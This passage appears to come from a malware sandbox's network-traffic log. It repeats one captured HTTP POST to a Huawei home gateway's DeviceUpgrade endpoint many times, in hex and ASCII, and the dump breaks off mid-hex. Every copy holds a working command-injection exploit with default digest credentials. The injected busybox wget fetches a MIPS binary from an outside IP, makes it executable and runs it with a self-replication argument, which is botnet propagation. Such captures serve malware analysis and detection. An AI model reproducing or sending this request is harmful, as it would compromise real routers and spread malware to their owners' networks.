31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 